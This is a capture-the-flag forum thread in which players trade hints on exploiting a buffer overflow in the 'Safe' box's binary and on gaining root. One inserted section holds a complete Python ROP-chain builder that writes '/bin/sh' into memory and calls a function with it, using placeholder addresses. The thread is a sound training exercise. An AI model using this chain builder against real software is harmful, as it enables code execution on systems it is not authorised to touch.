Safe

@adelmatrash said:

Someone can give me a hint (PM)? I can’t see how to use the gadgets that I found to write my string into memory.

same…

@sazouki said:

@adelmatrash said:

Someone can give me a hint (PM)? I can’t see how to use the gadgets that I found to write my string into memory.

same…

If you don’t have gadgets to write, take a different approach… Maybe there’s something else in the binary that allows you to do what you want easily.

There’s at least 1 gadget that you can use; r2 failed to find it, though, so I used ROPgadget instead.

Can’t believe this machine is rated ‘Easy’, I am still stuck on trying to exploit the binary.

Stuck at BOF, I cannot even make it work locally. Some hint or blog to read which could help me?

Any clue or help on how to download the binary? I’m on the high port and interacting with the exception, but no idea how to download it…

EDIT: SOLVED

I’m stuck with exploiting the binary when aslr is on :frowning: Help me?

Hints for buffer overflow:

  • If you own the stack, you own the IP
  • Make sure you look at all the functions available to you, even if they aren’t called
  • “set disable-randomization off” in gdb helps see what you have and what you can’t count on

Since it’s an easy machine, it should at least have been made obvious which function was easily exploitable in the binary. I did the binary exploitation with 2 different methods, but the intended way could be kind of easy to miss in the first place if you’re not familiar with the exploitation.
That being said if you feel lost, feel free to PM me on htb or discord sanre#5436. Don’t pm on forums since I’m not checking the inbox too often.

Really stuck on how to exploit the fact that the program is vulnerable to BOF. If someone is able to pm me on discord it would be helpful :smiley:

oneill#0460

How to write /bin/sh to the d**a section (or any writable section really)?
Edit: Solved and rooted!
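The question above (getting a string such as /bin/sh into a writable section with the gadgets you have) comes up often enough that a generic builder is worth having. The following is an added example, not code posted in this thread and not tied to the binary the thread discusses: every address, the offset to the saved return address and the target function are placeholder assumptions, to be replaced with what ROPgadget or r2 reports for your own target. It assumes an x86-64 SysV binary, and shows the classic "pop rdi; pop rsi; mov [rdi], rsi" write pattern, eight bytes per gadget round, followed by a call that receives the address of the freshly written string in rdi.

```python
#!/usr/bin/env python3
"""Added example (not from the thread): build a ROP chain that writes a
short string into a writable section (.data/.bss), then calls a function
with that address as its first argument.

ALL addresses, the offset and the target function below are ASSUMED
placeholders for illustration. They are not values from any real binary.
"""
import struct

# --- placeholders: every value here is an assumption, not a real address ---
OFFSET_TO_RET = 120        # bytes from buffer start to the saved return address
POP_RDI_RET   = 0x401001   # pop rdi ; ret
POP_RSI_RET   = 0x401003   # pop rsi ; ret
MOV_RDI_RSI   = 0x401005   # mov qword [rdi], rsi ; ret   (the "write" gadget)
RET_GADGET    = 0x40100d   # ret   (used to keep the stack 16-byte aligned)
WRITABLE_ADDR = 0x404040   # somewhere writable, e.g. inside .data or .bss
TARGET_FUNC   = 0x401100   # function that expects a char* in rdi


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value (same as pwntools' p64)."""
    return struct.pack("<Q", value)


def chunks8(s: bytes) -> list:
    """Split a C string (with its NUL terminator) into 8-byte chunks.

    Each chunk is what one 'mov [rdi], rsi' round stores, so the chain
    length grows by 5 qwords per chunk.
    """
    s = s + b"\x00"                       # C strings need the terminator
    return [s[i:i + 8].ljust(8, b"\x00") for i in range(0, len(s), 8)]


def write_string_chain(addr: int, s: bytes) -> bytes:
    """ROP chain that stores s at addr, 8 bytes per gadget round."""
    chain = b""
    for i, qword in enumerate(chunks8(s)):
        chain += p64(POP_RDI_RET) + p64(addr + 8 * i)   # rdi = destination
        chain += p64(POP_RSI_RET) + qword               # rsi = 8 bytes of data
        chain += p64(MOV_RDI_RSI)                       # [rdi] = rsi
    return chain


def build_payload(s: bytes = b"/bin/sh", align: bool = True) -> bytes:
    """Padding + write chain + call TARGET_FUNC(WRITABLE_ADDR)."""
    payload = b"A" * OFFSET_TO_RET
    payload += write_string_chain(WRITABLE_ADDR, s)
    payload += p64(POP_RDI_RET) + p64(WRITABLE_ADDR)    # arg0 = &string
    if align:
        payload += p64(RET_GADGET)   # one extra ret fixes alignment for libc calls
    payload += p64(TARGET_FUNC)
    return payload


def bad_bytes(payload: bytes, forbidden: bytes = b"\n") -> list:
    """Offsets of bytes the input routine would stop at or mangle.

    gets()/fgets() stop at a newline, so any address or data qword that
    contains 0x0a truncates the chain; check before sending.
    """
    return [i for i, b in enumerate(payload) if bytes([b]) in forbidden]


def save_payload(path: str, payload: bytes) -> int:
    """Write the payload to a file for '(cat payload; cat) | ./binary'."""
    with open(path, "wb") as fh:
        return fh.write(payload)


if __name__ == "__main__":
    pl = build_payload()
    print(f"payload length: {len(pl)} bytes, bad bytes at: {bad_bytes(pl)}")
    save_payload("payload", pl)
```

If the binary is the one the thread hints at, where something already present does the useful work for you, you may not need the write loop at all; the builder above is the general case for when a string has to be placed in memory first. Run `bad_bytes()` against the real addresses before sending: a single 0x0a inside a gadget address is the usual reason a chain that looks correct in gdb dies the moment it goes through `gets`.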


Great box IMHO. A great exercise for someone new to binary exploitation like myself. Some advice:

User:
I had trouble finding the correct commands to send what I needed to send to the binary. The “cat” command without a file name reads from stdin. So “(cat payload_file; cat) | ./vulnerable_binary” may be what you need to test your exploit payload.

Root:
The file that stands out - it can be “locked” with more than just a password.

Finally rooted! From my point of view not an easy machine for people inexperienced in binary exploitation, but really good to learn! Some advice for user would be to think about what you’ve got; you can use those things in your favour. As for root, do not spend too much time on cracking hashes, it should be really quick! PM me if you need hints!

Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

@0verfl00w said:
Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

I couldn’t get it to work with pwntools either, so I just settled for an ugly workaround by setting short timeouts in recvuntil, which works fine.

Will that binary run only on x64 architecture?

I am not able to run this binary!!!

a little help !

@0verfl00w said:

Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

Had similar issues. The final string actually has the \n at the start… recvall() should be the same as if you’d nc’d to the remote port, where it doesn’t show the prompt until you’ve given input; so recvall() is showing everything you’d normally see… I tried recvline(), recv() and recvuntil(), all the same.

@DHIYANESH @Fidget It is absolutely doable with pwntools, I had issues with it as well, most likely due to returns containing \n chars. I figured that I don’t really care about receiving any data, since it gets input from stdin I can just pass it along and it will be read when needed.

Yeah! Finally I got user! WOW, I’m very happy because I never wrote an exploit by myself.
This is my first! :blush:

Edit: got root.